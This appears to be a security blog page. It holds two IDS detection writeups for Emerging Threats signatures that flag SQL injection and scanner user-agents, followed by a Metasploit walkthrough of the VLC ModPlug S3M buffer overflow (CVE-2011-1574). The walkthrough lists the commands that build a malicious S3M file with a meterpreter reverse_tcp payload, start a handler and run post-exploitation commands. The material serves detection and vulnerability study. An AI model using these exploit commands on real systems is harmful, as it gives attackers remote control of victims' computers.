SUC024 : ET WEB SQL Injection Attempt (Agent NV32ts)

Opportunists, Use Cases
  • Use Case Reference : SUC024
  • Use Case Title : ET WEB SQL Injection Attempt (Agent NV32ts)
  • Use Case Detection : IDS / HTTP /SQL logs
  • Attacker Class : Opportunists
  • Attack Sophistication : Unsophisticated
  • Source IP(s) : Random
  • Source Countries : Random
  • Source Port(s) : Random
  • Destination Port(s) : 80/TCP, 443/TCP

Possible(s) correlation(s) :

  • SQL injection tool or bot

Source(s) :

Emerging Threats SIG 2009029 triggers are :

  • The HTTP header should contain “NV32ts” User-Agent string. Example : “User-Agent: NV32ts
  • The source port could be any FROM EXTERNAL_NET in destination of an HOME_NET HTTP_PORTS.
SIG 2009029 1 Week events activity
SIG 2009029 1 Week events activity
SIG 2009029 1 month events activity
SIG 2009029 1 month events activity
1 Month TOP 10 source IPs for SIG 2009029
1 Month TOP 10 source IPs for SIG 2009029

SUC023 : WebHack Control Center User-Agent Inbound (WHCC/)

Opportunists, Targeting Opportunists, Use Cases
  • Use Case Reference : SUC023
  • Use Case Title : WebHack Control Center User-Agent Inbound (WHCC/)
  • Use Case Detection : IDS / HTTP logs
  • Attacker Class : Opportunists / Targeting Opportunists 
  • Attack Sophistication : Unsophisticated / Low
  • Identified tool(s) : WebHack Control Center Web server vulnerability scanner
  • Source IP(s) : Random
  • Source Countries : Random
  • Source Port(s) : Random
  • Destination Port(s) : 80/TCP, 443/TCP

Possible(s) correlation(s) :

  • WebHack Control Center Web server vulnerability scanner

Source(s) :

Emerging Threats SIG 2003924 triggers are :

  • The HTTP header should contain “WHCC” User-Agent string. Example : “User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; WHCC/0.6; GTB6.6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2; .NET4.0C)
  • The source port could be any FROM EXTERNAL_NET in destination of an HOME_NET HTTP_PORTS.
SIG 2003924 1 Week events activity
SIG 2003924 1 Week events activity
SIG 2003924 1 month events activity
SIG 2003924 1 month events activity
1 Month TOP 10 source IPs for SIG 2003924
1 Month TOP 10 source IPs for SIG 2003924

CVE-2011-1574 : VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow

Exploits, Metasploit,

Timeline :

libmodplug vulnerability discovered by SEC Consult
libmodplug vendor contacted the 2011-03-25
libmodplug vendor release a new version the 2011-04-02
libmodplug vulnerability vulnérabilité publicly released the 2011-04-07
VideoLAN VLC 1.1.9 released the 2011-04-12
Metasploit PoC provided by duck the 2011-05-06

PoC provided by :

jduck

Reference(s) :

CVE-2011-1574
OSVDB-72143
VideoLAN VLC release notes

Affected version(s) :

VideoLAN VLC 1.1.8 and earlier versions for Windows, Macintosh, Linux and Solaris

Tested on Windows XP SP3 with :

VideoLAN VLC 1.1.8

Description :

This module exploits an input validation error in libmod_plugin as included with VideoLAN VLC 1.1.8. All versions prior to version 1.1.9 are affected. By creating a malicious S3M file, a remote attacker could execute arbitrary code. Although other products that bundle libmodplug may be vulnerable, this module was only tested against VLC. NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to permanently enable NX support on machines that support it. As such, this module is capable of bypassing DEP, but not ASLR.

Commands :

use exploit/windows/fileformat/vlc_modplug_s3m
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sysinfo
getuid